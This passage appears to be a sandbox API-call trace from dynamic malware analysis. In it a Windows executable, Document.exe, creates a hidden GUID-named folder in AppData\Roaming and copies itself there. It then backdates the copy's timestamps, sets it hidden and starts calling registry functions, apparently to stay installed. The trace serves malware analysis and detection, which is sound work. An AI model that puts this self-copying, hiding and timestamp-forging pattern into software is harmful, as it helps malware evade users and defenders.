(param_1="GetFileAttributesW") returned 0x13 [0200.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileAttributesW", cchWideChar=20, lpMultiByteStr=0x6d24ac, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetFileAttributesW", lpUsedDefaultChar=0x0) returned 20 [0200.000] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f258 | out: ppsaOut=0x30f258) returned 0x0 [0200.000] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.000] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0200.000] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.000] GetProcAddress (hModule=0x76220000, lpProcName="GetFileAttributesW") returned 0x76231b18 [0200.001] SafeArrayDestroyDescriptor (psa=0x6d4128) returned 0x0 [0200.001] SafeArrayDestroyDescriptor (psa=0x6d55e8) returned 0x0 [0200.001] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441")) returned 0xffffffff [0200.001] SafeArrayDestroyDescriptor (psa=0x6d4310) returned 0x0 [0200.001] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f474 | out: ppsaOut=0x30f474) returned 0x0 [0200.001] GetUserDefaultLCID () returned 0x409 [0200.001] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f244, cchData=6 | out: lpLCData="1252") returned 5 [0200.001] SysStringLen (param_1="kernel32") returned 0x9 [0200.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.001] SysStringLen (param_1="kernel32") returned 0x9 [0200.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=10, lpMultiByteStr=0x6d1c2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 10 [0200.002] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f254 | out: ppsaOut=0x30f254) returned 0x0 [0200.002] GetUserDefaultLCID () returned 0x409 [0200.002] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f244, cchData=6 | out: lpLCData="1252") returned 5 [0200.002] SysStringLen (param_1="GetFileAttributesW") returned 0x13 [0200.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileAttributesW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0200.002] SysStringLen (param_1="GetFileAttributesW") returned 0x13 [0200.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileAttributesW", cchWideChar=20, lpMultiByteStr=0x6d20c4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetFileAttributesW", lpUsedDefaultChar=0x0) returned 20 [0200.002] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f254 | out: ppsaOut=0x30f254) returned 0x0 [0200.002] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.002] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0200.002] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.002] GetProcAddress (hModule=0x76220000, lpProcName="GetFileAttributesW") returned 0x76231b18 [0200.002] SafeArrayDestroyDescriptor (psa=0x6d55e8) returned 0x0 [0200.003] SafeArrayDestroyDescriptor (psa=0x6d4128) returned 0x0 [0200.003] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441")) returned 0xffffffff [0200.003] SafeArrayDestroyDescriptor (psa=0x6d4310) returned 0x0 [0200.003] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f468 | out: ppsaOut=0x30f468) returned 0x0 [0200.003] GetUserDefaultLCID () returned 0x409 [0200.003] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f234, cchData=6 | out: lpLCData="1252") returned 5 [0200.003] SysStringLen (param_1="kernel32") returned 0x9 [0200.003] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.003] SysStringLen (param_1="kernel32") returned 0x9 [0200.003] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=10, lpMultiByteStr=0x6d1c2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 10 [0200.003] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f244 | out: ppsaOut=0x30f244) returned 0x0 [0200.004] GetUserDefaultLCID () returned 0x409 [0200.004] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f234, cchData=6 | out: lpLCData="1252") returned 5 [0200.004] SysStringLen (param_1="CreateDirectoryW") returned 0x11 [0200.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateDirectoryW", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0200.004] SysStringLen (param_1="CreateDirectoryW") returned 0x11 [0200.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateDirectoryW", cchWideChar=18, lpMultiByteStr=0x6d24ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateDirectoryW", lpUsedDefaultChar=0x0) returned 18 [0200.004] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f244 | out: ppsaOut=0x30f244) returned 0x0 [0200.004] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.004] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0200.004] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.004] GetProcAddress (hModule=0x76220000, lpProcName="CreateDirectoryW") returned 0x76234259 [0200.004] SafeArrayDestroyDescriptor (psa=0x6d55e8) returned 0x0 [0200.004] SafeArrayDestroyDescriptor (psa=0x6d4128) returned 0x0 [0200.004] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441"), lpSecurityAttributes=0x6d1b98) returned 1 [0200.005] SafeArrayDestroyDescriptor (psa=0x6d4310) returned 0x0 [0200.005] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.005] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0200.005] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.006] GetProcAddress (hModule=0x76220000, lpProcName="Sleep") returned 0x762310ff [0200.006] Sleep (dwMilliseconds=0x32) [0200.095] GetLastError () returned 0x0 [0200.095] GetUserDefaultLCID () returned 0x409 [0200.095] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f510 | out: pdblOut=0x30f510) returned 0x0 [0200.096] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f480 | out: ppsaOut=0x30f480) returned 0x0 [0200.096] GetUserDefaultLCID () returned 0x409 [0200.096] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f24c, cchData=6 | out: lpLCData="1252") returned 5 [0200.096] SysStringLen (param_1="kernel32") returned 0x9 [0200.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.096] SysStringLen (param_1="kernel32") returned 0x9 [0200.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=10, lpMultiByteStr=0x6d1c2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 10 [0200.096] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f25c | out: ppsaOut=0x30f25c) returned 0x0 [0200.096] GetUserDefaultLCID () returned 0x409 [0200.096] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f24c, cchData=6 | out: lpLCData="1252") returned 5 [0200.096] SysStringLen (param_1="SetFileAttributesW") returned 0x13 [0200.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetFileAttributesW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0200.096] SysStringLen (param_1="SetFileAttributesW") returned 0x13 [0200.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetFileAttributesW", cchWideChar=20, lpMultiByteStr=0x6d20c4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetFileAttributesW", lpUsedDefaultChar=0x0) returned 20 [0200.096] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f25c | out: ppsaOut=0x30f25c) returned 0x0 [0200.096] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.096] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0200.097] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.097] GetProcAddress (hModule=0x76220000, lpProcName="SetFileAttributesW") returned 0x7624d4f7 [0200.097] SafeArrayDestroyDescriptor (psa=0x6d55e8) returned 0x0 [0200.097] SafeArrayDestroyDescriptor (psa=0x6d4128) returned 0x0 [0200.097] SetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", dwFileAttributes=0x2) returned 1 [0200.097] SafeArrayDestroyDescriptor (psa=0x6d4310) returned 0x0 [0200.097] Sleep (dwMilliseconds=0x32) [0200.183] GetLastError () returned 0x0 [0200.183] VarBstrCmp (bstrLeft="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", bstrRight="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe", lcid=0x0, dwFlags=0x30001) returned 0x0 [0200.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe", cchWideChar=-1, lpMultiByteStr=0x30f1c4, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe", lpUsedDefaultChar=0x0) returned 112 [0200.184] GetFullPathNameA (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe", nBufferLength=0x104, lpBuffer=0x30f404, lpFilePart=0x30f1bc | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe", lpFilePart=0x30f1bc*="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe") returned 0x6f [0200.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", cchWideChar=-1, lpMultiByteStr=0x30f1c4, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpUsedDefaultChar=0x0) returned 56 [0200.184] GetFullPathNameA (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", nBufferLength=0x104, lpBuffer=0x30f2fc, lpFilePart=0x30f1bc | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpFilePart=0x30f1bc*="Document.exe") returned 0x37 [0200.184] IMalloc:Alloc (This=0x75e366bc, cb=0xfe00) returned 0x6d6c58 [0200.185] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x30f2bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0200.185] GetFileType (hFile=0x108) returned 0x1 [0200.185] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x30f2bc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0200.186] GetFileType (hFile=0x10c) returned 0x1 [0200.186] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.187] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.205] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.205] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.206] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.207] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.208] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.208] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.209] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.210] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.212] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.213] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.214] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.214] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.215] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.215] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.216] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.217] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.219] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xfe00, lpOverlapped=0x0) returned 1 [0200.219] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xfe00, lpOverlapped=0x0) returned 1 [0200.221] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0xe800, lpOverlapped=0x0) returned 1 [0200.221] WriteFile (in: hFile=0x10c, lpBuffer=0x6d6c58*, nNumberOfBytesToWrite=0xe800, lpNumberOfBytesWritten=0x30eea8, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesWritten=0x30eea8*=0xe800, lpOverlapped=0x0) returned 1 [0200.222] ReadFile (in: hFile=0x108, lpBuffer=0x6d6c58, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x30f2b0, lpOverlapped=0x0 | out: lpBuffer=0x6d6c58*, lpNumberOfBytesRead=0x30f2b0*=0x0, lpOverlapped=0x0) returned 1 [0200.222] CloseHandle (hObject=0x10c) returned 1 [0200.276] CloseHandle (hObject=0x108) returned 1 [0200.276] IMalloc:Free (This=0x75e366bc, pv=0x6d6c58) [0200.276] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0200.277] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0200.277] GetFileTime (in: hFile=0x108, lpCreationTime=0x30f2c4, lpLastAccessTime=0x30f2cc, lpLastWriteTime=0x30f2d4 | out: lpCreationTime=0x30f2c4*(dwLowDateTime=0x1176ca50, dwHighDateTime=0x1d474ea), lpLastAccessTime=0x30f2cc*(dwLowDateTime=0x1176ca50, dwHighDateTime=0x1d474ea), lpLastWriteTime=0x30f2d4*(dwLowDateTime=0x6b4b370, dwHighDateTime=0x1d474ea)) returned 1 [0200.277] SetFileTime (hFile=0x10c, lpCreationTime=0x30f2c4, lpLastAccessTime=0x30f2cc, lpLastWriteTime=0x30f2d4) returned 1 [0200.277] CloseHandle (hObject=0x108) returned 1 [0200.277] CloseHandle (hObject=0x10c) returned 1 [0200.277] GetUserDefaultLCID () returned 0x409 [0200.277] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f510 | out: pdblOut=0x30f510) returned 0x0 [0200.277] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f480 | out: ppsaOut=0x30f480) returned 0x0 [0200.277] GetUserDefaultLCID () returned 0x409 [0200.278] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f24c, cchData=6 | out: lpLCData="1252") returned 5 [0200.278] SysStringLen (param_1="kernel32") returned 0x9 [0200.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.278] SysStringLen (param_1="kernel32") returned 0x9 [0200.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=10, lpMultiByteStr=0x6d1c2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 10 [0200.278] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f25c | out: ppsaOut=0x30f25c) returned 0x0 [0200.278] GetUserDefaultLCID () returned 0x409 [0200.278] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f24c, cchData=6 | out: lpLCData="1252") returned 5 [0200.278] SysStringLen (param_1="SetFileAttributesW") returned 0x13 [0200.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetFileAttributesW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0200.278] SysStringLen (param_1="SetFileAttributesW") returned 0x13 [0200.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetFileAttributesW", cchWideChar=20, lpMultiByteStr=0x6d24ac, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetFileAttributesW", lpUsedDefaultChar=0x0) returned 20 [0200.278] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f25c | out: ppsaOut=0x30f25c) returned 0x0 [0200.278] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.278] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0200.279] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.279] GetProcAddress (hModule=0x76220000, lpProcName="SetFileAttributesW") returned 0x7624d4f7 [0200.279] SafeArrayDestroyDescriptor (psa=0x6d55e8) returned 0x0 [0200.279] SafeArrayDestroyDescriptor (psa=0x6d4128) returned 0x0 [0200.279] SetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe", dwFileAttributes=0x2) returned 1 [0200.279] SafeArrayDestroyDescriptor (psa=0x6d4310) returned 0x0 [0200.279] GetUserDefaultLCID () returned 0x409 [0200.279] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f510 | out: pdblOut=0x30f510) returned 0x0 [0200.279] GetUserDefaultLCID () returned 0x409 [0200.280] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f5a0 | out: pdblOut=0x30f5a0) returned 0x0 [0200.280] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f45c | out: ppsaOut=0x30f45c) returned 0x0 [0200.280] GetUserDefaultLCID () returned 0x409 [0200.280] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.280] SysStringLen (param_1="advapi32") returned 0x9 [0200.280] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.280] SysStringLen (param_1="advapi32") returned 0x9 [0200.280] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="advapi32", cchWideChar=10, lpMultiByteStr=0x6d1c2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32", lpUsedDefaultChar=0x0) returned 10 [0200.280] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f1fc | out: ppsaOut=0x30f1fc) returned 0x0 [0200.280] GetUserDefaultLCID () returned 0x409 [0200.281] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f1ec, cchData=6 | out: lpLCData="1252") returned 5 [0200.281] SysStringLen (param_1="RegCreateKeyW") returned 0xe [0200.281] WideCharToMultiByte (in: 